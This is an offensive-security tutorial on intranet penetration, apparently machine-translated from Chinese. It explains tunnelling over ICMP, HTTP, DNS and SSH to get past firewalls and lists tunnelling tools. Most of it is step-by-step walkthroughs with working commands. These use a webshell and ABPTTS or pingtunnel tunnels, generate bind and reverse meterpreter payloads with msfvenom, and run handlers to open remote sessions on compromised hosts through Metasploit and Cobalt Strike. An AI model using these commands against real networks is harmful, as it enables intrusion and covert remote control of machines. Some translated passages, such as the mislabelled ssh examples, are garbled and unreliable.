I. Introduction
There are many articles about intranet penetration on the Internet, but most of them focus on the use of tools, and the principles are rarely mentioned. This article will start with the principle of intranet traversal, and flexibly design the corresponding intranet traversal scheme according to different intranet outbound and inbound situations.
2. The principle of intranet penetration
Intranet penetration is: using various tunneling technologies to bypass the blockade of the network firewall with the protocol allowed by the network firewall, so as to access the blocked target network.
What is tunnel technology? Let's look at the explanation of the encyclopedia entry
Tunneling is a method of passing data between networks by using the infrastructure of the internetwork. The data (or payload) transmitted through the tunnel may be data frames or packets of different protocols. The tunneling protocol re-encapsulates the data frames or packets of these other protocols in new packet headers and sends them. The new header provides routing information so that the encapsulated payload data can be passed across the Internet. The encapsulated packets are routed through the public internetwork between the two endpoints of the tunnel. The logical path through which the encapsulated data packets are transmitted on the public Internet is called a tunnel. Once at the end of the network, the data is unpacked and forwarded to the final destination. Note that tunnel technology refers to the whole process including data encapsulation, transmission and unpacking.
The tunneling technologies we commonly use for intranet penetration include dns tunneling, http tunneling, ssh tunneling, icmp tunneling and other protocols that are easily allowed by network firewalls.
These tunneling technologies can be layered according to the protocol layer they are in.
- network layer tunnel
ICMP tunneling, etc.
- transport layer tunnel
TCP tunnel, UDP tunnel
- application layer tunnel
HTTP, DNS, SSH and other tunnels
All possible access methods of intranet hosts
- Allow the ICMP protocol to go out of the network
The network firewall allows the ICMP protocol to go out of the network, that is, it can ping the external network hosts, and generally can go out of the network
- Allow specific TCP or UDP protocol ports to go out of the network
The network firewall allows specific TCP or UDP ports to go out of the network, such as the default listening ports of common applications such as 22, 53, 80, 443, and 3389 connected to the external network. In a network environment that cannot go out of the network, detect all the TCP and UPD ports, and usually one or two common ports can be found to go out of the network. This is usually the result of misconfiguration and laziness by the network administrator. For example, the configured firewall rules are inconsistent, and when parsing encounters matching rules, the execution will exit; for example, the network administrator configures port 3306 that allows the web server to access the mysql database of another subnet. The network administrator is lazy when configuring, and may directly release the web server to port 3306 of any ip address
-
Allow specific application layer protocols to go out of the network (such as HTTP, SSH, DNS and other application layer protocols)
This kind of network firewall can identify the protocols of the application layer and release the protocols that are allowed to go out of the network, such as HTTP, SSH, DNS, RDP and other application layer protocols; usually the office network allows the HTTP protocol to go out of the network, and the domain name whitelist may restrict the
intranet All possible network access methods of the host -
Allow ICMP protocol to access the network
Can ping the target host
- Allow specific TCP or UDP protocol ports to enter the network
NAT port maps the public network IP port to the service port of the intranet host, such as NAT mapping web services and mysql services to the public network
- Allow specific application layer protocols to access the network
This kind of network firewall can identify the protocols of the application layer and allow the protocols allowed to enter the network. For example, HTTP reverse proxy, which reversely proxies HTTP traffic received from the public network to the intranet host. The current mainstream network access method usually adds a layer of WAF to review the network traffic
3. Common tools for intranet penetration
3.1. Network Layer Tunnel Tool
-
Can bounce cmd through ICMP protocol, single function, the bounced cmd is extremely unstable, not recommended
-
Create a virtual network card to transmit network card traffic through the ICMP protocol. VPN based on ICMP tunnel requires root privileges, which is very dynamic and not recommended.
-
tcp, udp, socks5 over ICMP, fast speed, stable connection, cross-platform, client mode can be used normally without administrator privileges, recommended
3.2. Transport Layer Tunneling Tool
- netcat
The Swiss Army Knife in network tools, not much introduction, linux system generally comes with
- powercat
netcat for powershell
- shocked
It has the function of recording the forwarding flow, which is convenient for viewing the forwarding content. It needs to be installed
- netsh
The network configuration tool that comes with the windows system
- lcx
port forwarding tool
- NATBypass
An implementation of lcx under golang, better cross-platform, better documentation
- joke
Port forwarding & Intranet proxy tool, similar in function to lcx/ew, simplifies command line parameters, supports UDP traffic forwarding, better cross-platform. Disadvantages: does not support listening to specified IP, and listens to 0.0.0.0:port by default, which will increase the risk of exposure
3.3. Application Layer Tunneling Tool
Since there are many application layer protocols, there are also many corresponding tunneling tools. The protocols we often use for tunneling are DNS, HTTP, SSH, SOCKS, etc.
- dnscat2
Not only can create DNS tunnel, but also C2
- dnscat2-powershell
Powershell client for dnscat2
- dns2tcp
TCP over DNS, that is, forwarding TCP connections through DNS tunnels
- iodine
IPv4 over DNS, that is, forwarding IPv4 data packets through DNS tunnels
- reGeorg
SOCKS over HTTP, that is, forward SOCKS through HTTP tunnel
- Neo-reGeorg
A refactored version of reGeorg, improving stability and usability, avoiding feature detection, and actively updating
- reDuh
TCP over HTTP, that is, forwarding TCP connections through the HTTP tunnel, the tunnel is unstable
- Barrel
TCP, SOCKS over HTTP, that is, forwarding TCP connection and SOCKS through HTTP tunnel, the tunnel is unstable
- ABPTTS
TCP over HTTP, that is, forwarding TCP connections through HTTP tunnels, data encryption, HTTP data can be customized, anti-feature detection is very good, and the tunnel created is very stable. Unfortunately, the supported web script types are only aspx and jsp
- EarthWorm
Very convenient multi-level SOCKS proxy, has been permanently stopped updating
- Termite
The upgraded version of EarthWorm has been permanently stopped updating
- Venom
Venom is a multi-level proxy tool developed in Go designed for penetration testers.
- ssocks
Forward and reverse socks tool with small executable size
- s5.go
A socks service tool written in go language, with good cross-platform features
- ssh
local forwarding:
Remote forwarding:ssh -CNfg -L 127.0.0.1:7777:114.114.114.114:9999 [email protected] #ssh客户端监听127.0.0.1:7777, 将收到的tcp数据包通过连接到192.168.1.1的ssh隧道转发到ssh服务端,再由服务端转发到114.114.114.114:9999
Dynamic forwarding:ssh -CNfg -R 127.0.0.1:7777:114.114.114.114:9999 [email protected] #ssh服务端监听127.0.0.1:7777, 将收到的tcp数据包通过连接到192.168.1.1的ssh隧道转发到ssh客户端,再由ssh客户端转发到114.114.114.114:9999
Common parameters for building an ssh tunnel:ssh -CNfg -D 127.0.0.1:7777 [email protected] # ssh客户端监听127.0.0.1:7777开启socks服务,将收到的socks数据包通过连接到192.168.1.1的ssh隧道转发到ssh服务端,再由ssh服务端转发到目标地址
-C 压缩传输,提高传输速度 -f 后台执行数据传输 -N 建立静默连接 -g 允许远程主机连接本地用于转发的端口 -L 本地端口转发 -R 远程端口转发 -D 动态转发,即SOCKS代理 -p 指定ssh连接端口
4. Intranet penetration cases in actual combat
4.1. Intranet hosts with zero out-of-network online
Practical background: The host that obtained the webshell is located in the intranet, and the network layer protocols such as icmp of the intranet host cannot go out of the network, the transport layer protocols such as tcp and udp cannot go out of the network, and the application layer protocols such as dns and http cannot go out of the network. The data channel is a reverse proxy web application.
Design
Use the HTTP connection where the reverse proxy web application is located to build a forward TCP over HTTP
tunnel. Through this tunnel, we can initiate a tcp connection to the intranet host. TCP over HTTP
Generate a bind-type payload, upload and execute it through the webshell, and it will monitor a port. Our remote control platform can go online by connecting to the monitored port through the constructed tunnel.
There are tools that can build TCP over HTTP
tunnels ABPTTS、Tunna、reDuh
, etc. Since Tunna、reDuh
the built tcp connection is unstable, it is selected here ABPTTS
.
4.1.1, online metasploit
1. Build a tcp connection through a forward http tunnel
# 配置abptts运行环境
# 注意windows安装pycrypto库需要先安装依赖http://aka.ms/vcpython27
pip install httplib2
pip install pycrypto
# 生成server端脚本
python abpttsfactory.py -o server
# 上传server端脚本到web服务器,客户端运行以下命令
python abpttsclient.py -c server/config.txt -u "http://192.168.168.10/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888
# abptts客户端监听127.0.0.1:7777,通过http://192.168.168.10/abptts.aspx这个http隧道,将tcp连接127.0.0.1:7777转发到web服务器网络下的127.0.0.1:8888
2. Generate the payload of bind type, upload and execute it through webshell
# 这里的rhost和lport是转发的目的IP和端口
msfvenom -p windows/meterpreter/bind_tcp rhost=127.0.0.1 lport=8888 -f exe -o meterpreter.exe
3. Start msf monitoring and wait for meterpreter to go online
#这里的rhost和lport是abptts客户端监听的IP和端口,msf所在主机必须能访问到这个IP和端口,这里msf和abptts在同一个主机上
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 7777
lport => 7777
msf5 exploit(multi/handler) > run
[*] Started bind TCP handler against 127.0.0.1:7777
[*] Sending stage (180291 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 127.0.0.1:7777) at 2020-04-27 04:50:25 -0400
meterpreter > getuid
Server username: DESKTOP-0AH7FQ0\admin
4.1.2, launch cobaltstrike
Since cobaltstrike's bind type listeners only have beacon TCP and beacon SMB, and both must connect to the parent beacon, they cannot directly connect to the cobalstrike server, so we need a parent beacon to relay the connection.
1. Build a tcp connection through a forward http tunnel
# 配置abptts运行环境
# 注意windows安装pycrypto库需要先安装依赖http://aka.ms/vcpython27
pip install httplib2
pip install pycrypto
# 生成server端脚本
python abpttsfactory.py -o server
# 上传server端脚本到web服务器,客户端运行以下命令
python abpttsclient.py -c server/config.txt -u "http://192.168.168.121/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888
# abptts客户端监听127.0.0.1:7777,通过http://192.168.168.121/abptts.aspx这个http隧道,将tcp连接127.0.0.1:7777转发到web服务器网络下的127.0.0.1:8888
2. Create a reverse listener
3. Generate a parent beacon
4. Upload the parent beacon to the abptts client for execution
5. Create a listener whose payload is tcp beacon
6. Generate a stageless child beacon
7. Upload and execute the generated child beacon through webshell
# 可以通过webshell查看网络监听,确保子beacon执行成功
netstat -ano | findstr 127.0.0.1:8888
8. Connect the listening ip and port of abptts in the parent beacon
9. Successfully log in to the webshell intranet host that cannot go out of the network
4.2. On-line intranet hosts that only go out through the icmp protocol
Practical background: We obtained the shell of the intranet host through a certain channel, but the current channel is not suitable for remote control communication channels (such as a website with separated site and library, we obtained the shell of the database server through sql injection, but the database server only has icmp protocol can go out of the network), transport layer protocols such as tcp and udp cannot go out of the network, application layer protocols such as dns and http cannot go out of the network, and only icmp protocol can go out of the network.
Design
The icmp protocol can go out of the network, and the icmp protocol can be used to build a reverse TCP over ICMP
tunnel or SOCKS over ICMP
the tunnel goes online to the remote control platform. The tool for building tunnels uses pingtunnel, which can forward tcp, udp, socks5 connections through icmp tunnels.
4.2.1, icmp tunnel forwarding tcp online metasploit
1. Prepare a server with public network ip, and run the following command with root authority to start the ICMP tunnel server
./pingtunnel -type server -noprint 1 -nolog 1
2. The ICMP tunnel client (that is, the host that needs to go online through the ICMP tunnel) executes the following command to successfully create a reverse ICMP tunnel
pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1
# 该命令的意思是icmp客户端监听127.0.0.1:9999,通过连接到icmpserver_ip的icmp隧道,将127.0.0.1:9999收到的tcp数据包转发到c2_server_ip:7777
3. Generate the meterpreter of the reverse payload and upload it to the ICMP tunnel client for execution to go online
msfvenom -p windows/meterpreter/reverse_https lhost=127.0.0.1 lport=9999 -f exe -o meterpreter.exe
# 这里的lhost和lport为icmp客户端监听ip和端口
4. Start msf monitoring and wait for meterpreter to go online
# 这里的lhost和lport为icmp客户端转发到的ip和端口
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 7777
lport => 7777
msf5 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:7777
meterpreter > getuid
Server username: DESKTOP-test0\admin
4.2.2, icmp tunnel forwarding socks online metasploit
1. Prepare a server with public network ip, and run the following command with root authority to start the ICMP tunnel server
./pingtunnel -type server -noprint 1 -nolog 1
2. The ICMP tunnel client (that is, the host that needs to go online through the ICMP tunnel) executes the following command to successfully create a reverse ICMP tunnel
pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1
# 该命令的意思是icmp隧道客户端监听127.0.0.1:6688启动socks5服务,通过连接到icmpserver_ip的icmp隧道,由icmpserver转发socks5代理请求到目的地址
3. Generate a meterpreter that supports the reverse payload of the socks5 proxy and upload it to the ICMP tunnel client for execution to go online
msfvenom -p windows/meterpreter/reverse_https LHOST=c2_server_ip LPORT=8443 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=6688 -f exe -o meterpreter.exe
4. Start msf monitoring and wait for meterpreter to go online
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 8443
lport => 8443
msf5 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:8443
meterpreter > getuid
Server username: DESKTOP-test0\admin
4.2.3, icmp tunnel forwarding tcp online cobaltstrike
1. Prepare a server with public network ip, and run the following command with root authority to start the ICMP tunnel server
./pingtunnel -type server -noprint 1 -nolog 1
2. The ICMP tunnel client (that is, the host that needs to go online through the ICMP tunnel) executes the following command to successfully create a reverse ICMP tunnel
pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1
# 该命令的意思是icmp隧道客户端监听127.0.0.1:9999,通过连接到icmpserver_ip的icmp隧道,将127.0.0.1:9999收到的tcp数据包转发到c2_server_ip:7777
3.cobaltstrike creates a listener
# https host和https port(c2)为icmp隧道客户端的监听ip和端口
# https port(bind)为转发目的地址的端口
4. Generate a beacon with a reverse payload
5. Upload the generated beacon to the ICMP tunnel client for execution, and successfully go online through the reverse ICMP tunnel
4.2.4, icmp tunnel forwarding socks online cobaltstrike
1. Prepare a server with public network ip, and run the following command with root authority to start the ICMP tunnel server
./pingtunnel -type server -noprint 1 -nolog 1
2. The ICMP tunnel client (that is, the host that needs to go online through the ICMP tunnel) executes the following command to successfully create a reverse ICMP tunnel
pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1
# 该命令的意思是icmp隧道客户端监听127.0.0.1:6688启动socks5服务,通过连接到icmpserver_ip的icmp隧道,由icmpserver转发socks5代理请求到目的地址
3.cobaltstrike creates a listener
# 这里的代理可以是socks或者http
# 好像cobaltstrike不支持socks5代理,这里并不能成功上线
# 这里也可以使用http代理,不过需要工具将http代理转为socks5代理,比如privoxy
4. Select the created listener to generate a beacon and upload it to the target for execution to go online
V. Summary
The essence of intranet penetration in intranet penetration is nothing more than realizing the forwarding of transport layer protocol tcp/udp data packets through various communication channels, whether forward or reverse, and application layer protocols are based on transport layer protocols Achieved. for exampleABPTTS + SOCKS服务 = reGeorg
The conditions for intranet penetration in intranet penetration can be remote code execution through a certain communication channel. If remote code execution can be performed through a certain communication channel, the forwarding of tcp/udp data packets, that is, the TCP/UDP over something
tunnel, can be realized through this communication channel. If there is no ready-made tool, we may need to develop it ourselves. For example, if the shell is obtained through sql injection, we can also use this communication channel to forward tcp/udp data packets. There is no ready-made tool, and we only need to develop tools. The tunnel client encapsulates the tcp/udp data packets into the database, and then The tunnel server reads the encapsulated data packet from the database, unpacks it, and sends it to the corresponding address.
6. Zero-Basic Introduction to Penetration Testing
For students who have never been exposed to network security/penetration testing, I have prepared a detailed learning and growth roadmap for you. It can be said that it is the most scientific and systematic learning route, and it is no problem for everyone to follow this general direction.